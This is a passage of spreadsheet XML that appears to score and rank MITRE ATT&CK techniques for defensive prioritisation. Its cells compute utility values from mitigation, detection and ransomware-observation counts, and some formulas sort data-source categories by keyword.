      <c r="AC195" s="37"/>
      <c r="AD195" s="50" t="s">
        <v>698</v>
      </c>
      <c r="AE195" s="37" t="str" cm="1">
        <f t="array" ref="AE195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD195)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF195" s="37">
        <v>191</v>
      </c>
      <c r="AG195" s="37" t="str" cm="1">
        <f t="array" ref="AG195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH195" s="37">
        <v>191</v>
      </c>
      <c r="AI195" s="37" t="str" cm="1">
        <f t="array" ref="AI195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD195)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ195" s="37">
        <v>191</v>
      </c>
      <c r="AK195" s="37" t="str" cm="1">
        <f t="array" ref="AK195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL195" s="37">
        <v>191</v>
      </c>
      <c r="AM195" s="37" t="str" cm="1">
        <f t="array" ref="AM195">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD195)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN195" s="37">
        <v>0</v>
      </c>
      <c r="AO195" s="37">
        <v>8</v>
      </c>
      <c r="AP195" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.56666666666666665</v>
      </c>
      <c r="AQ195" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>409.214225</v>
      </c>
      <c r="AR195" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS195" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AT195" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.38095238095238093</v>
      </c>
      <c r="AU19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78.136042857142854</v>
      </c>
    </row>
    <row r="196" spans="1:47" ht="34">
      <c r="A196" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B196" s="37">
        <f t="shared" si="2"/>
        <v>276.0625776190476</v>
      </c>
      <c r="C196" s="37" t="s">
        <v>699</v>
      </c>
      <c r="D196" s="50" t="s">
        <v>700</v>
      </c>
      <c r="E196" s="37"/>
      <c r="F196" s="37">
        <v>3</v>
      </c>
      <c r="G196" s="37">
        <v>2</v>
      </c>
      <c r="H196" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I196" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J196" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K196" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L196" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M196" s="37">
        <v>6.1370000000000001E-2</v>
      </c>
      <c r="N196" s="56">
        <v>0</v>
      </c>
      <c r="O196" s="56">
        <v>6</v>
      </c>
      <c r="P196" s="56">
        <v>1</v>
      </c>
      <c r="Q196" s="56">
        <v>3</v>
      </c>
      <c r="R196" s="57"/>
      <c r="S196" s="57">
        <v>0</v>
      </c>
      <c r="T196" s="57"/>
      <c r="U196" s="57">
        <v>0</v>
      </c>
      <c r="V196" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="W196" s="37">
        <v>0</v>
      </c>
      <c r="X196" s="37">
        <v>0</v>
      </c>
      <c r="Y196" s="37">
        <v>0</v>
      </c>
      <c r="Z196" s="37">
        <v>10</v>
      </c>
      <c r="AA196" s="37">
        <v>0.1</v>
      </c>
      <c r="AB196" s="37">
        <v>0.1</v>
      </c>
      <c r="AC196" s="37"/>
      <c r="AD196" s="50" t="s">
        <v>469</v>
      </c>
      <c r="AE196" s="37" t="str" cm="1">
        <f t="array" ref="AE196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD196)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF196" s="37">
        <v>192</v>
      </c>
      <c r="AG196" s="37" t="str" cm="1">
        <f t="array" ref="AG196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH196" s="37">
        <v>192</v>
      </c>
      <c r="AI196" s="37" t="str" cm="1">
        <f t="array" ref="AI196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ196" s="37">
        <v>192</v>
      </c>
      <c r="AK196" s="37" t="str" cm="1">
        <f t="array" ref="AK196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL196" s="37">
        <v>192</v>
      </c>
      <c r="AM196" s="37" t="str" cm="1">
        <f t="array" ref="AM196">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD196)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN196" s="37">
        <v>0</v>
      </c>
      <c r="AO196" s="37">
        <v>2</v>
      </c>
      <c r="AP196" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ196" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>92.020859206349201</v>
      </c>
      <c r="AR196" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS196" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT196" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU19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4.4295647241118665</v>
      </c>
    </row>
    <row r="197" spans="1:47" ht="68">
      <c r="A197" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B197" s="37">
        <f t="shared" ref="B197:B260" si="3">SUM(H197,M197,V197)*(1+SUM(AF197,AH197,AJ197,AL197,AN197))</f>
        <v>349.69066023809523</v>
      </c>
      <c r="C197" s="37" t="s">
        <v>701</v>
      </c>
      <c r="D197" s="50" t="s">
        <v>702</v>
      </c>
      <c r="E197" s="37"/>
      <c r="F197" s="37">
        <v>2</v>
      </c>
      <c r="G197" s="37">
        <v>2</v>
      </c>
      <c r="H197" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I197" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J197" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K197" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L197" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M197" s="37">
        <v>0</v>
      </c>
      <c r="N197" s="56">
        <v>0</v>
      </c>
      <c r="O197" s="56">
        <v>4</v>
      </c>
      <c r="P197" s="56">
        <v>3</v>
      </c>
      <c r="Q197" s="56">
        <v>8</v>
      </c>
      <c r="R197" s="57" t="s">
        <v>703</v>
      </c>
      <c r="S197" s="57">
        <v>5</v>
      </c>
      <c r="T197" s="57" t="s">
        <v>704</v>
      </c>
      <c r="U197" s="57">
        <v>14</v>
      </c>
      <c r="V197" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238119047619045</v>
      </c>
      <c r="W197" s="37">
        <v>19</v>
      </c>
      <c r="X197" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y197" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z197" s="37">
        <v>15</v>
      </c>
      <c r="AA197" s="37">
        <v>0.15</v>
      </c>
      <c r="AB197" s="37">
        <v>0.15</v>
      </c>
      <c r="AC197" s="37"/>
      <c r="AD197" s="50" t="s">
        <v>674</v>
      </c>
      <c r="AE197" s="37" t="str" cm="1">
        <f t="array" ref="AE197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD197)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF197" s="37">
        <v>193</v>
      </c>
      <c r="AG197" s="37" t="str" cm="1">
        <f t="array" ref="AG197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD197)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH197" s="37">
        <v>193</v>
      </c>
      <c r="AI197" s="37" t="str" cm="1">
        <f t="array" ref="AI197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD197)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ197" s="37">
        <v>193</v>
      </c>
      <c r="AK197" s="37" t="str" cm="1">
        <f t="array" ref="AK197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD197)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL197" s="37">
        <v>193</v>
      </c>
      <c r="AM197" s="37" t="str" cm="1">
        <f t="array" ref="AM197">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD197)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN197" s="37">
        <v>0</v>
      </c>
      <c r="AO197" s="37">
        <v>1</v>
      </c>
      <c r="AP197" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ197" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>116.56355341269841</v>
      </c>
      <c r="AR197" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS197" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT197" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU19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2.7991322241118666</v>
      </c>
    </row>
    <row r="198" spans="1:47" ht="17">
      <c r="A198" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B198" s="37">
        <f t="shared" si="3"/>
        <v>155.39985200000001</v>
      </c>
      <c r="C198" s="37" t="s">
        <v>705</v>
      </c>
      <c r="D198" s="50" t="s">
        <v>702</v>
      </c>
      <c r="E198" s="37" t="s">
        <v>706</v>
      </c>
      <c r="F198" s="37">
        <v>1</v>
      </c>
      <c r="G198" s="37">
        <v>1</v>
      </c>
      <c r="H198" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I198" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J198" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K198" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L198" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M198" s="37">
        <v>0</v>
      </c>
      <c r="N198" s="56">
        <v>0</v>
      </c>
      <c r="O198" s="56">
        <v>1</v>
      </c>
      <c r="P198" s="56">
        <v>0</v>
      </c>
      <c r="Q198" s="56">
        <v>2</v>
      </c>
      <c r="R198" s="57">
        <v>3.1</v>
      </c>
      <c r="S198" s="57">
        <v>1</v>
      </c>
      <c r="T198" s="57" t="s">
        <v>707</v>
      </c>
      <c r="U198" s="57">
        <v>8</v>
      </c>
      <c r="V198" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.9999809523809519E-2</v>
      </c>
      <c r="W198" s="37">
        <v>9</v>
      </c>
      <c r="X198" s="37">
        <v>0.163636</v>
      </c>
      <c r="Y198" s="37">
        <v>0.163636</v>
      </c>
      <c r="Z198" s="37">
        <v>3</v>
      </c>
      <c r="AA198" s="37">
        <v>0.03</v>
      </c>
      <c r="AB198" s="37">
        <v>0.03</v>
      </c>
      <c r="AC198" s="37"/>
      <c r="AD198" s="50" t="s">
        <v>101</v>
      </c>
      <c r="AE198" s="37" t="str" cm="1">
        <f t="array" ref="AE198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD198)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF198" s="37">
        <v>194</v>
      </c>
      <c r="AG198" s="37" t="str" cm="1">
        <f t="array" ref="AG198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH198" s="37">
        <v>194</v>
      </c>
      <c r="AI198" s="37" t="str" cm="1">
        <f t="array" ref="AI198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD198)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ198" s="37">
        <v>194</v>
      </c>
      <c r="AK198" s="37" t="str" cm="1">
        <f t="array" ref="AK198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL198" s="37">
        <v>194</v>
      </c>
      <c r="AM198" s="37" t="str" cm="1">
        <f t="array" ref="AM198">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD198)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN198" s="37">
        <v>0</v>
      </c>
      <c r="AO198" s="37">
        <v>0</v>
      </c>
      <c r="AP198" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ198" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>51.799950666666668</v>
      </c>
      <c r="AR198" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS198" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT198" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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99" spans="1:47" ht="51">
      <c r="A199" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B199" s="37">
        <f t="shared" si="3"/>
        <v>219.4238467142857</v>
      </c>
      <c r="C199" s="37" t="s">
        <v>708</v>
      </c>
      <c r="D199" s="50" t="s">
        <v>702</v>
      </c>
      <c r="E199" s="37" t="s">
        <v>709</v>
      </c>
      <c r="F199" s="37">
        <v>1</v>
      </c>
      <c r="G199" s="37">
        <v>1</v>
      </c>
      <c r="H199" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I199" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J199" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K199" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L199" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M199" s="37">
        <v>0</v>
      </c>
      <c r="N199" s="56">
        <v>0</v>
      </c>
      <c r="O199" s="56">
        <v>0</v>
      </c>
      <c r="P199" s="56">
        <v>1</v>
      </c>
      <c r="Q199" s="56">
        <v>3</v>
      </c>
      <c r="R199" s="57" t="s">
        <v>710</v>
      </c>
      <c r="S199" s="57">
        <v>4</v>
      </c>
      <c r="T199" s="57" t="s">
        <v>711</v>
      </c>
      <c r="U199" s="57">
        <v>13</v>
      </c>
      <c r="V199" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.18095242857142857</v>
      </c>
      <c r="W199" s="37">
        <v>17</v>
      </c>
      <c r="X199" s="37">
        <v>0.309091</v>
      </c>
      <c r="Y199" s="37">
        <v>0.309091</v>
      </c>
      <c r="Z199" s="37">
        <v>4</v>
      </c>
      <c r="AA199" s="37">
        <v>0.04</v>
      </c>
      <c r="AB199" s="37">
        <v>0.04</v>
      </c>
      <c r="AC199" s="37"/>
      <c r="AD199" s="50" t="s">
        <v>712</v>
      </c>
      <c r="AE199" s="37" t="str" cm="1">
        <f t="array" ref="AE199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD199)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF199" s="37">
        <v>195</v>
      </c>
      <c r="AG199" s="37" t="str" cm="1">
        <f t="array" ref="AG199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD199)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH199" s="37">
        <v>195</v>
      </c>
      <c r="AI199" s="37" t="str" cm="1">
        <f t="array" ref="AI199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD199)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ199" s="37">
        <v>195</v>
      </c>
      <c r="AK199" s="37" t="str" cm="1">
        <f t="array" ref="AK199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD199)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL199" s="37">
        <v>195</v>
      </c>
      <c r="AM199" s="37" t="str" cm="1">
        <f t="array" ref="AM199">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD199)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN199" s="37">
        <v>0</v>
      </c>
      <c r="AO199" s="37">
        <v>0</v>
      </c>
      <c r="AP199" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ199" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>73.141282238095229</v>
      </c>
      <c r="AR199" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS199" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT199" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU19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00" spans="1:47" ht="17">
      <c r="A200" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B200" s="37">
        <f t="shared" si="3"/>
        <v>194.3807654761905</v>
      </c>
      <c r="C200" s="37" t="s">
        <v>713</v>
      </c>
      <c r="D200" s="50" t="s">
        <v>702</v>
      </c>
      <c r="E200" s="37" t="s">
        <v>714</v>
      </c>
      <c r="F200" s="37">
        <v>1</v>
      </c>
      <c r="G200" s="37">
        <v>1</v>
      </c>
      <c r="H200" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I200" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J200" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K200" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L200" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M200" s="37">
        <v>0</v>
      </c>
      <c r="N200" s="56">
        <v>0</v>
      </c>
      <c r="O200" s="56">
        <v>0</v>
      </c>
      <c r="P200" s="56">
        <v>1</v>
      </c>
      <c r="Q200" s="56">
        <v>2</v>
      </c>
      <c r="R200" s="57" t="s">
        <v>715</v>
      </c>
      <c r="S200" s="57">
        <v>3</v>
      </c>
      <c r="T200" s="57" t="s">
        <v>716</v>
      </c>
      <c r="U200" s="57">
        <v>11</v>
      </c>
      <c r="V200" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761880952380954</v>
      </c>
      <c r="W200" s="37">
        <v>14</v>
      </c>
      <c r="X200" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y200" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z200" s="37">
        <v>3</v>
      </c>
      <c r="AA200" s="37">
        <v>0.03</v>
      </c>
      <c r="AB200" s="37">
        <v>0.03</v>
      </c>
      <c r="AC200" s="37"/>
      <c r="AD200" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE200" s="37" t="str" cm="1">
        <f t="array" ref="AE200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF200" s="37">
        <v>196</v>
      </c>
      <c r="AG200" s="37" t="str" cm="1">
        <f t="array" ref="AG200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD200)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH200" s="37">
        <v>196</v>
      </c>
      <c r="AI200" s="37" t="str" cm="1">
        <f t="array" ref="AI200">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD200)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ200" s="37">
        <v>196</v>
      </c>
      <c r="AK200" s="37" t="str" cm="1">
